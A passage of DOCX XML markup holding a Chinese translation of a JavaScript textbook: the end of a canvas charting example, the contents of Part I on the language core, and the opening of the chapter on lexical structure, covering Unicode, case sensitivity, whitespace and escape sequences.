      </w:pPr>
      <w:r>
        <w:t>g.textBaseline="middle";//</w:t>
      </w:r>
      <w:r>
        <w:t>文字垂直居中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>ticks=[monthly*payments,principal];//</w:t>
      </w:r>
      <w:r>
        <w:t>我们将要用到的两个点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var rightEdge=paymentToX(payments);//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>ticks.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>对每两个点做循环</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=amountToY(ticks[i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>计算每个标记的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>g.fillRect(rightEdge-3,y-0.5,3,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制标记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fillText(String(ticks[i].toFixed(0)),//</w:t>
      </w:r>
      <w:r>
        <w:t>绘</w:t>
      </w:r>
      <w:r>
        <w:t>制文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>rightEdge-5,y);</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1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="Di_Yi_Bu_Fen__JavaScriptYu_Yan_He_Xin___"/>
      <w:bookmarkStart w:id="25" w:name="Di_Yi_Bu_Fen__JavaScriptYu_Yan_He_Xin_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">第一部分　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书该部分（第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>章）描述</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心。这部分是该语言的主要参考资料。学习之初通读一遍该部分，以后在遇到</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的难点时，回到这里重新查阅相关内容以巩固知识的掌握：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>章　词法结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>章　类型、值和变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章　表达式和运算符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>章　语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章　对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章　数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章　函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章　类和模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章　正则表达式的模式匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的子集和扩展</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>章　服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="Di_2Zhang__Ci_Fa_Jie_Gou_"/>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>章　词法结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>编程语言的词法结构是一套基础性规则，用来描述如何使用这门语言来编写程序。作为语法的基础，它规定了诸如变量名是什么样的、怎么写注释，以及程序语句之间如何分隔等规则。本章用很短的篇幅来介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的词法结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="2_1_Zi_Fu_Ji_"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　字符集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序是用</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符集编写的。</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Latin-1</w:t>
      </w:r>
      <w:r>
        <w:t>的超集，并支持地球上几乎所有在用的语言。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>要求</w:t>
      </w:r>
      <w:r>
        <w:t>JavaS</w:t>
      </w:r>
      <w:r>
        <w:t>cript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现必须支持</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode 2.1</w:t>
      </w:r>
      <w:r>
        <w:t>及后续版本，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>则要求支持</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode 3</w:t>
      </w:r>
      <w:r>
        <w:t>及后续版本。可以参考</w:t>
      </w:r>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>边栏</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来了解更多关于</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="2_1_1_Qu_Fen_Da_Xiao_Xie_"/>
      <w:r>
        <w:t>2.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　区分大小写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是区分大小写的语言。也就是说，关键字、变量、函数名和所有的标识符（</w:t>
      </w:r>
      <w:r>
        <w:t>identifier</w:t>
      </w:r>
      <w:r>
        <w:t>）都必须采取一致的大小写形式。比如，关键字</w:t>
      </w:r>
      <w:r>
        <w:t>"while"</w:t>
      </w:r>
      <w:r>
        <w:t>必须写成</w:t>
      </w:r>
      <w:r>
        <w:t>"while"</w:t>
      </w:r>
      <w:r>
        <w:t>，而不能写成</w:t>
      </w:r>
      <w:r>
        <w:t>"While"</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>"WHILE"</w:t>
      </w:r>
      <w:r>
        <w:t>。同样，</w:t>
      </w:r>
      <w:r>
        <w:t>"online"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Online"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"OnL</w:t>
      </w:r>
      <w:r>
        <w:t>ine"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"ONLINE"</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个不同的变量名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>并不区分大小写（尽管</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>区分大小写）。由于它和客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>联系紧密，因此这点区别很容易混淆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。许多客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象和属性与它们所表示的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签和属性同名。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中，这些标签和属性名可以使用大写也可以是小写，而在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中则必须是小写。例如，在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中设置事件处理程序时，</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以写成</w:t>
      </w:r>
      <w:r>
        <w:t>onClick</w:t>
      </w:r>
      <w:r>
        <w:t>，但在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码（或者</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档）中，必须使用小写的</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="2_1_2_Kong_Ge___Huan_Xing_Fu_He_Ge_Shi_K"/>
      <w:r>
        <w:t>2.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　空格、换行符和格式控制符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会忽略程序中标识（</w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>之间的空格。多数情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>同样会忽略换行符（</w:t>
      </w:r>
      <w:r>
        <w:t>2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节提到了一种意外情形）。由于可以在代码中随意使用空格和换行，因此可以采用整齐、一致的缩进来形成统一的编码风格，从而提高代码的可读性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了可以识别普通的空格符（</w:t>
      </w:r>
      <w:r>
        <w:t>\u0020</w:t>
      </w:r>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>还可以识别如下这些表示空格的字符：水平制表符（</w:t>
      </w:r>
      <w:r>
        <w:t>\u0009</w:t>
      </w:r>
      <w:r>
        <w:t>）、垂直制表符（</w:t>
      </w:r>
      <w:r>
        <w:t>\u000B</w:t>
      </w:r>
      <w:r>
        <w:t>）、换页符（</w:t>
      </w:r>
      <w:r>
        <w:t>\u000C</w:t>
      </w:r>
      <w:r>
        <w:t>）、不中断空白</w:t>
      </w:r>
      <w:r>
        <w:t>(\u00A</w:t>
      </w:r>
      <w:r>
        <w:t>0)</w:t>
      </w:r>
      <w:r>
        <w:t>、字节序标记</w:t>
      </w:r>
      <w:r>
        <w:t>(\uFEFF)</w:t>
      </w:r>
      <w:r>
        <w:t>，以及在</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>中所有</w:t>
      </w:r>
      <w:r>
        <w:t>Zs</w:t>
      </w:r>
      <w:r>
        <w:t>类别的字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如下字符识别为行结束符：换行符（</w:t>
      </w:r>
      <w:r>
        <w:t>\u000A</w:t>
      </w:r>
      <w:r>
        <w:t>），回车符（</w:t>
      </w:r>
      <w:r>
        <w:t>\u000D</w:t>
      </w:r>
      <w:r>
        <w:t>），行分隔符（</w:t>
      </w:r>
      <w:r>
        <w:t>\u2028</w:t>
      </w:r>
      <w:r>
        <w:t>），段分隔符（</w:t>
      </w:r>
      <w:r>
        <w:t>\u2029</w:t>
      </w:r>
      <w:r>
        <w:t>）。回车符加换行符在一起被解析为一个单行结束符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>格式控制字符（</w:t>
      </w:r>
      <w:r>
        <w:t>Cf</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>），比如</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>从右至左书写标记</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>\u200F</w:t>
      </w:r>
      <w:r>
        <w:t>）和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>从左至右书写标记</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>\u200E</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>，控制着文本的视觉显示，这对于一些非英语文本的正确显示来说是至关重要的，这些字符可以用在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScirpt</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>注释、字符串直接量和正则表达式直接量中，但不能用在标识符（比如，变量名）中。但有个例外，零宽连接符（</w:t>
      </w:r>
      <w:r>
        <w:t>\u200D</w:t>
      </w:r>
      <w:r>
        <w:t>）和零宽非连接符（</w:t>
      </w:r>
      <w:r>
        <w:t>\uFEFF</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>是可以出现在标识符中的，但不能作为标识符的首字符。上文也提到了，字节序标记格式控制符（</w:t>
      </w:r>
      <w:r>
        <w:t>\uFEFF</w:t>
      </w:r>
      <w:r>
        <w:t>）被当成了空格来对待。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="2_1_3_UnicodeZhuan_Yi_Xu_Lie_"/>
      <w:r>
        <w:t>2.1.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>转义序列</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在有些计算机硬件和软件里，无法显示或输入</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符全集。为了支持那些使用老旧技术的程序员，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一种特殊序列，使用</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字符来代表任意</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>内码。这些</w:t>
      </w:r>
      <w:r>
        <w:t>Un</w:t>
      </w:r>
      <w:r>
        <w:t>icode</w:t>
      </w:r>
      <w:r>
        <w:t>转义序列均以</w:t>
      </w:r>
      <w:r>
        <w:t>\u</w:t>
      </w:r>
      <w:r>
        <w:t>为前缀，其后跟随</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个十六进制数（使用数字以及大写或小写的字母</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>表示）。这种</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>转义写法可以用在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串直接量、正则表达式直接量和标识符中（关</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>键字除外）。例如，字符</w:t>
      </w:r>
      <w:r>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>转义写法为</w:t>
      </w:r>
      <w:r>
        <w:t>\u00E9</w:t>
      </w:r>
      <w:r>
        <w:t>，如下两个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串是完全一样的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"café"==="caf\u00e9"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>转义写法也可以出现在注释中，但由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会将注释忽略，它们只是被当成上下文中的</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字符处理，而且并不会被</w:t>
      </w:r>
      <w:r>
        <w:t>解析为其对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="2_1_4_Biao_Zhun_Hua_"/>
      <w:r>
        <w:t>2.1.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　标准化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>允许使用多种方法对同一个字符进行编码。比如，字符</w:t>
      </w:r>
      <w:r>
        <w:t>“é”</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>字符</w:t>
      </w:r>
      <w:r>
        <w:t>\u00E9</w:t>
      </w:r>
      <w:r>
        <w:t>表示，也可以使用普通的</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>字符</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>跟随一个语调符</w:t>
      </w:r>
      <w:r>
        <w:t>\u0301</w:t>
      </w:r>
      <w:r>
